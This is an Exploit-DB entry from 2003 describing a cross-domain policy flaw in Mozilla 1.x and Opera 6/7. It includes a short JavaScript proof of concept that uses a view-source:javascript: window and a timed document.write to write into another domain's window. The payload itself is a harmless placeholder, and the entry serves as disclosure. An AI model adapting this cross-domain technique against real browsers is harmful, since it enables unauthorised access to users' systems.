Mozilla 1.x,opera 6/7 Timed Document.Write Method Cross Domain Policy Vulnerability

2003-06-07T00:00:00
ID EDB-ID:22751
Type exploitdb
Reporter meme-boi
Modified 2003-06-07T00:00:00

Description

Mozilla 1.x,opera 6/7 Timed Document.Write Method Cross Domain Policy Vulnerability. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/7847/info

It has been reported that under some circumstances, it is possible violate the cross-domain restriction of browser security. Because of this, an attacker may be able to execute a file across domains and in the local security zone, giving an attacker unintended access to a system. Symantec has not been able to verify the claims. 

<script>
function werd()
{
a.document.open();
a.document.write("<h1>werd</h1>");
a.document.close();
}

function winopen() {

a=window.open("view-source:javascript:location='http://www.example.com';");

setTimeout('werd()',23000);
}

</script>